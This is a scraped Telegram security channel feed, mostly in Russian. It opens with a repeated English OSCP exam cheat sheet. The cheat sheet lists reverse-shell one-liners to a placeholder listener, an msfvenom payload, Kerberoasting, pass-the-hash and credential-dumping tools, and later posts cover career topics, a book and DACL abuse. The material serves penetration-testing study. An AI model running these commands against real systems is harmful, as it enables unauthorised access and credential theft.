OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux
Preparing for the OSCP exam or diving into penetration testing? Here’s a quick rundown of essential tools, commands, and techniques to help you succeed!
🔍 Recon & Enumeration
Nmap: nmap -sV -p- <IP> (Full scan)
SMB: crackmapexec smb <IP> -u user -p pass --shares
HTTP: gobuster dir -u http://<IP> -w wordlist.txt
⚡️ Exploitation
Reverse Shells:
Bash: bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
MSFVenom: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Privilege Escalation:
Windows: Check winpeas.exe or powerup.ps1
Linux: sudo -l or find / -perm -u=s -type f 2>/dev/null
🔑 Password Cracking
John: john --wordlist=rockyou.txt hash
Hashcat: hashcat -m 1000 hash.txt wordlist.txt
🛠 Active Directory
Kerberoasting: impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request
Pass-the-Hash: psexec.[py]-hashes LM:NTLM user@target
📌 Pro Tips:
Always check /etc/passwd, registry keys, and scheduled tasks for privesc paths.
Use tools like BloodHound for AD mapping and Mimikatz for credential dumping.
1010111 1101000 1101001 1110100 1100101 110010 1101000 1100001 1100011 1101011
#pentest #exam
Preparing for the OSCP exam or diving into penetration testing? Here’s a quick rundown of essential tools, commands, and techniques to help you succeed!
🔍 Recon & Enumeration
Nmap: nmap -sV -p- <IP> (Full scan)
SMB: crackmapexec smb <IP> -u user -p pass --shares
HTTP: gobuster dir -u http://<IP> -w wordlist.txt
⚡️ Exploitation
Reverse Shells:
Bash: bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
MSFVenom: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Privilege Escalation:
Windows: Check winpeas.exe or powerup.ps1
Linux: sudo -l or find / -perm -u=s -type f 2>/dev/null
🔑 Password Cracking
John: john --wordlist=rockyou.txt hash
Hashcat: hashcat -m 1000 hash.txt wordlist.txt
🛠 Active Directory
Kerberoasting: impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request
Pass-the-Hash: psexec.[py]-hashes LM:NTLM user@target
📌 Pro Tips:
Always check /etc/passwd, registry keys, and scheduled tasks for privesc paths.
Use tools like BloodHound for AD mapping and Mimikatz for credential dumping.
1010111 1101000 1101001 1110100 1100101 110010 1101000 1100001 1100011 1101011
#pentest #exam
1❤🔥5🔥1
OSCP Cheat Sheet_Your Ultimate Penetration Testing Guide.pdf
1.5 MB
OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux
🔥7❤🔥2❤1
Pentest award уже третий год отмечает талантливых специалистов, которые делают огромную работу по поиску уязвимостей, оставаясь за кадром.
Важен сам подход и идея, необычные ресерчи и методики. Приз за победу — фирменная именная статуэтка и макбук. За второе место — айфон, а за третье — смарт-часы.
#event
Please open Telegram to view this post
VIEW IN TELEGRAM
👎4👍3❤2🔥2🤝1
KrokIT — стартап-акселератор с корнями из Беларуси, созданный бизнес-инкубатором «С нами будущее». Цель — помочь стартапам быстро добиться успеха, снизить риски и повысить привлекательность для инвесторов.
🔝 Главная страница (FB + YT + LnkdIn)
#info #startup #world
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👎3🤔2
В сеть попали внутренние инструкции Microsoft по оплате труда технических специалистов, которые дают представление о реальных зарплатах и бонусах в одной из крупнейших ИТ-компаний.
В Microsoft действует система уровней (грейдов), отражающая должность и опыт сотрудника. Уровни 57–59 соответствуют джуниорам, уровень 63 считается отправной точкой для сеньоров, а с 65-го начинается «принципальный» (principal) уровень. Еще выше — партнеры (68) и признанные эксперты (distinguished, 70).
Например, инженер на самом высоком уровне 70 может получать до $408 000 в год (в зависимости от локации), а также получить разовую акционную премию при найме до $1,9 миллиона и ежегодные акции на сумму до $1,476 миллиона. Для новичков (уровень 57) «главный» диапазон зарплаты составляет от $83 000 до $108 000, а в городах с высоким уровнем жизни — от $95 800 до $124 600. При найме им также полагаются бонус и пакет акций.
❗️ Источник
#analytics #world
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯4❤2👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
😁5👻4❤3
ЯВОВА русский FAANG. Почему я больше не мечтаю о работе в БигТех, оригинальный пост Artur Kiurebegov
Когда-то БигТех казался мне вершиной IT-карьеры:
✅ крутые задачи,
✅ умные люди,
✅ престиж,
✅ высокий уровень жизни.
Но спустя годы в индустрии, я переосмыслил, чего хочу от работы.
Вот почему для меня БигТех больше не цель:
🔥 1. Хардкор — не всегда кайф
Сложные системы, многослойные процессы, кросс-командные конфликты, бюрократия. Не всегда ты «строишь ракету», иногда — просто бьёшься о стену.
📊 2. Ценность ≠ масштаб
В небольших командах ты чувствуешь вклад каждый день. В FAANG можно годами пилить фичу, которую никто не заметит.
🧠 3. Не хочу тратить жизнь на лики и промо
Гонки за грейдом, «системы баллов», борьба за внимание менеджеров. Я хочу расти как специалист, а не играть в корпоративные шахматы.
🌍 4. Гибкость и свобода — важнее бренда
Удалёнка, work-life баланс, адекватные люди и понятные процессы — вот что стало для меня приоритетом.
💡 5. Мне важнее смысл, а не логотип на резюме
Я хочу делать продукты, которые реально кому-то помогают. И это не всегда про большие корпорации.
БигТех — это круто. Но не единственный путь. И уж точно не универсальный.
❓ ❓ А вы как думаете — БигТех всё ещё must-have или переоценено?❓ ❓
#talk
Когда-то БигТех казался мне вершиной IT-карьеры:
✅ крутые задачи,
✅ умные люди,
✅ престиж,
✅ высокий уровень жизни.
Но спустя годы в индустрии, я переосмыслил, чего хочу от работы.
Вот почему для меня БигТех больше не цель:
🔥 1. Хардкор — не всегда кайф
Сложные системы, многослойные процессы, кросс-командные конфликты, бюрократия. Не всегда ты «строишь ракету», иногда — просто бьёшься о стену.
📊 2. Ценность ≠ масштаб
В небольших командах ты чувствуешь вклад каждый день. В FAANG можно годами пилить фичу, которую никто не заметит.
🧠 3. Не хочу тратить жизнь на лики и промо
Гонки за грейдом, «системы баллов», борьба за внимание менеджеров. Я хочу расти как специалист, а не играть в корпоративные шахматы.
🌍 4. Гибкость и свобода — важнее бренда
Удалёнка, work-life баланс, адекватные люди и понятные процессы — вот что стало для меня приоритетом.
💡 5. Мне важнее смысл, а не логотип на резюме
Я хочу делать продукты, которые реально кому-то помогают. И это не всегда про большие корпорации.
БигТех — это круто. Но не единственный путь. И уж точно не универсальный.
#talk
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣7👍3🔥1👏1😁1🎉1🙏1🙈1
Защита систем. Чему «Звездные войны» учат инженера ПО, Адам Шостак, 2025
Практическое руководство по написанию безопасных приложений с помощью опыта мастеров-джедаев из «Звездных войн».
Чему могут научить R2-D2, Дарт Вейдер, Хан Соло или даже Йода в плане безопасности программного обеспечения? В книге «Защита систем: чему „Звездные войны“ учат инженеров ПО» дан целый арсенал стратегий и методов защиты, которые применимы не только в фантастическом мире, но и в реальных работающих системах.
Что внутри:
✅ Легкость и польза: безопасный код приложений с использованием идей из вселенной «Звездных войн».
✅ Практические модели безопасности: STRIDE и защита от злоумышленников.
✅ Безопасность, удобство использования и быстрая доставка: увлекательная дорожная карта разработки современных приложений.
✅ Закономерности проблем безопасности и оптимальные решения.
Адам Шостак – профессор Школы компьютерных наук и инженерии при Вашингтонском университете, эксперт по моделированию веб-угроз, гейм-дизайнер и судебный консультант. Много лет он посвятил разработке безопасных продуктов и систем. В мире бизнеса диапазон его опыта охватывает самые разные области, от основания стартапов до почти десяти лет работы в Microsoft. Помимо консультирования и преподавания, Шостак выступает в качестве советника по безопасности многих компаний.
#book #AppSec
Практическое руководство по написанию безопасных приложений с помощью опыта мастеров-джедаев из «Звездных войн».
Чему могут научить R2-D2, Дарт Вейдер, Хан Соло или даже Йода в плане безопасности программного обеспечения? В книге «Защита систем: чему „Звездные войны“ учат инженеров ПО» дан целый арсенал стратегий и методов защиты, которые применимы не только в фантастическом мире, но и в реальных работающих системах.
Что внутри:
✅ Легкость и польза: безопасный код приложений с использованием идей из вселенной «Звездных войн».
✅ Практические модели безопасности: STRIDE и защита от злоумышленников.
✅ Безопасность, удобство использования и быстрая доставка: увлекательная дорожная карта разработки современных приложений.
✅ Закономерности проблем безопасности и оптимальные решения.
Адам Шостак – профессор Школы компьютерных наук и инженерии при Вашингтонском университете, эксперт по моделированию веб-угроз, гейм-дизайнер и судебный консультант. Много лет он посвятил разработке безопасных продуктов и систем. В мире бизнеса диапазон его опыта охватывает самые разные области, от основания стартапов до почти десяти лет работы в Microsoft. Помимо консультирования и преподавания, Шостак выступает в качестве советника по безопасности многих компаний.
#book #AppSec
❤5😁1
Zaschita_sistem_Chemu_Zvezdnyie_voynyi_uchat_inzhenera_PO.fb2
3.3 MB
Защита систем. Чему «Звездные войны» учат инженера ПО, Адам Шостак, 2025
👍3
Пацаны из конторы «Инфосистемы Джет» — выполнили 130 проектов и выяснили, что в среднем достаточно 10 часов, чтобы вывести крупные суммы со счетов, остановить производство или слить критичную информацию. В работе мы используем сложные методы, но из-за низкой защищенности организаций часто хватает базовых техник и общедоступного ПО.
Наши наблюдения подтверждаются исследованиями кибератак: в 83% случаев злоумышленники добивались успеха за счет «простых» методов — фишинг, эксплуатация уязвимостей по умолчанию или слабые пароли. State of art атаки с поиском 0-day — это скорее исключение. Обычно компании взламывают куда более прозаичными способами.
В этой статье мы разберем реальные кейсы из нашей практики, покажем, какие уязвимости не устранялись годами, и объясним, почему настройки по умолчанию и стандартные пароли — это хорошо для нас то, что делать не надо.
❗️Источник
#pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥6❤4👍3👎1👏1
DACL Abuse Mindmap
DACL (Discretionary Access Control List) — список избирательного управления доступом, контролируемый владельцем объекта и регламентирующий права пользователей и групп на действия с объектом (чтение, запись, удаление и т. д.)
По умолчанию DACL управляется владельцем объекта или пользователем, который создал этот объект, и содержит записи управления доступом (ACE — Access control entries), определяющие доступ пользователя к объекту.
DACL-злоупотребление — это использование неправильно настроенных списков контроля доступа (DACL) для получения несанкционированных привилегий в домене Active Directory или Linux хосте.
#pentest
DACL (Discretionary Access Control List) — список избирательного управления доступом, контролируемый владельцем объекта и регламентирующий права пользователей и групп на действия с объектом (чтение, запись, удаление и т. д.)
По умолчанию DACL управляется владельцем объекта или пользователем, который создал этот объект, и содержит записи управления доступом (ACE — Access control entries), определяющие доступ пользователя к объекту.
DACL-злоупотребление — это использование неправильно настроенных списков контроля доступа (DACL) для получения несанкционированных привилегий в домене Active Directory или Linux хосте.
#pentest
🔥6❤1👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣23❤2❤🔥2👍1🤔1